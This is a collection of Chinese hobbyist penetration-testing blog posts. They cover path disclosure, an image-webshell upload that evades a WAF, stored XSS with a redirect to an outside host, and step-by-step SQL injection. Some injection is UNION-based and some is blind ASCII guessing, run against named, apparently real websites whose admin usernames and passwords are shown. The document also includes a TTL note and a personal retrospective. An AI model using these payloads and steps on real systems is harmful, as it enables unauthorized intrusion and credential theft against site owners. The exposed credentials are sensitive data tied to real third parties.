通过网站的报错信息

通过传递一些错误参数，比如',"等符号，使网站报错，有些报错会给出绝对路径

通过搜索引擎获取

搜索引擎语法：

site:example.com warning
site:example.com "fatal error"

其实还是找报错信息，因为部分网站做了对报错的处理，所以可能前端传参不容易造成报错

读取网站的配置文件

若存在注入点，可以使用load_file()等函数来读取配置文件获取绝对路径

Windows

Linux：

XAMPP配置文件

phpstudy配置文件：

LAMPP配置文件：

phpmyadmin爆路径

/phpmyadmin/themes/darkblue_orange/layout.inc.php

本质上还是报错

代码执行漏洞

eval()函数可控的话，直接传入phpinfo()，通过phpinfo页面中Document_Root参数获取网站绝对路径

头一次哈，还是上回那个站

毫无技术含量

我们用以前注入出来的账号密码

因为这次注入，，

会出现这个神奇的东西

我们用上次注入出来的账号密码登录后台，一切都没有变

然后还是上次的上传点

我尝试了1.asp

结果：无返回

抓包发现是安全狗拦截了

改成1.jpg

发现也拦截了

于是我翻了翻家里面的《白帽子讲web安全》

发现可能是用文件头判断的

于是我自制了一个图片马

如图

在一个正常图片（记事本打开）随意的地方插入一句话

改成jpg格式上传，上传成功

然后我们数据库备份

我们直接一句话连接

用过狗刀

因为

过狗刀下载：http://www.cncaidao.org/

我们直接连接

没啥技术含量

我曾经在某个编程吧混迹过一段时间

最近突然去看看

大家居然都已经玩的灰常高端了

于是，一个云储存吸引了我的注意

好高端的样子，不得不为这个界面点赞

这回我全程打码

因为这个作者非常良心

反正灰常牛逼就是了

我在注册账号的时候账号密码全部填写<script>alert("xss")</script>

等到我登录的时候发现执行了

但是我很快发现这并没有什么用

打开个人中心

然后随便上传了个文件

不能上传php哈

但是可以重命名为php文件

想想办法getshell（明天再说）

然后我发现在这个文件重命名处也可以XSS

分享出去后我发现文件名会出现在主页

那么我猜测主页会执行

<script>alert("xss")</script>

是的没错

我转念一想

直接执行<script>window.location="http://www.e-wolf.top/a.html";</script>

可好

想了想算了

给站长留句话

走人

突然在瞬间

我看到了

白打码了

不过这下不怕你们乱搞了

前言

TTL值判断操作系统是2015年左右的说话，具体科学性未知，仅作为参考，不可作为绝对的判断条件

什么是TTL

TTL（Time To Live，生存时间）是IP协议包中的一个值，当我们使用Ping命令进行网络连通测试或者是测试网速的时候，本地计算机会向目的主机发送数据包，但是有的数据包会因为一些特殊的原因不能正常传送到目的主机，如果没有设置TTL值的话，数据包会一直在网络上面传送，浪费网络资源。数据包在传送的时候至少会经过一个以上的路由器，当数据包经过一个路由器的时候，TTL就会自动减1，如果减到0了还是没有传送到目的主机，那么这个数据包就会自动丢失，这时路由器会发送一个ICMP报文给最初的发送者。举个例子，如果一个主机的TTL是64，那么当它经过64个路由器后还没有将数据包发送到目的主机的话，那么这个数据包就会自动丢弃。

TTL值与主机对照表

仅作为参考，具体操作系统还需要经过验证

学渗透一年多了，看过的教程没有10套也有8套，不过都是些被翻拍的垃圾教程（除了明小子就是啊D）直到我看完了小迪哥发的免费教程，我才意识到，这才叫学习资料，我想开个博客，求推荐一个速度快的免费空间撒

废话不多说

目标站http://www.fuhouxiang.com(大家请合理练手)

看到这个站，我们随便打开一个连接看看

http://www.fuhouxiang.com/NewsView.asp?ID=312

根据迪哥的方法，直接在参数后面随便输入字符提交，如果报错说明他接收并执行了你加的参数，所以存在注入

看来是存在注入

用order判断下字段数

order by 12返回正常

order by 13返回错误所以我们使用一下语句

http://www.fuhouxiang.com/NewsView.asp?ID=312 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from admin

得到

然后将2换为username 7换为password

http://www.fuhouxiang.com/NewsView.asp?ID=312 UNION SELECT 1,username,3,4,5,6,password,8,9,10,11,12 from admin

得到

username 和password都是lyqlkj

注入出账号密码了，妈的死活扫描不到后台地址，御剑加大字典也找不到

但是我灵机一动

robots.txt

很好，成功的引起了我的注意

然后进入后台找到添加产品，额，直接上传asp居然不带过滤的

又是我，今天学会逐字猜解注入asp+access了

速度有点慢哈。。

欢迎大家和我一起交流学习哈

废话不多说了

目标站http://www.wdyyj.com

首先我打开站点随便一个链接



http://www.wdyyj.com/wl/show.asp?id=81

在我order by失败后，无论order by 多少总会提示我语句出错（缺少分号）于是我问问了，决定改用逐字猜解法

首先我们确定一下表







返回正常

说明存在admin表

然后查列

返回正常如图





然后确定是否有pass





看来pass这个列名是存在的

现在我们开始猜解user

直觉告诉我账户应该是admin所以我直接猜解他的长度为5





返回正常的确是5

猜一下第一位，如果是a南无就能确定账号是admin

猜解asc码为97

97的对应值为a

返回正常





现在已经能确定是admin了

直接猜解pass

http://www.wdyyj.com/wl/show.asp?id=81 

and (select top 1 asc(mid(pass,1,1)) from admin)=49

返回正常，猜解到对应的asc码为1，，，而且前面猜解出5位，，，我猜是12345

后台登录试试

发现居然对了。。





ok

回忆

2015年10月25日我写下了博客的第一篇正经博客，标题为《DedeCMS找后台技巧》，今天是2021年3月26日，很多年过去了，我还是一如既往的菜，当时一起入门的朋友都已经成为了大佬甚至已经成就了一番事业，在安全这条路上，我走了很多弯路，但是最主要的原因还是自己懒，不愿意付出努力，去学一些原理性的，底层的东西，在PHP已经快要被JavaWeb替代的今天，我还是不怎么会写PHP，好在现在还在读大学，有大把的时间去学习

想法

最近恶补了很多东西，数据结构，算法，安全原理等等，今天我也删除了很多的老文章，想把每一篇文章写得透彻，写得完整，每次自己吐槽着CSDN上那些肤浅的文章的时候，自己又写得很潦草，老双标了，并不一定要让多少人来关注我的博客，主要是为了能更好的做好笔记
人脑的记忆能力是有限的，还是得建立起属于自己的知识库，在我尝试了Gitbook等方案之后，决定采用博客 + Github同步MD的方法来进行,从今天开始，我会逐步的重写以前的老文章

最后

最近很忙，忙起来好啊，老老实实的提升自己的专业能力，准备考研上岸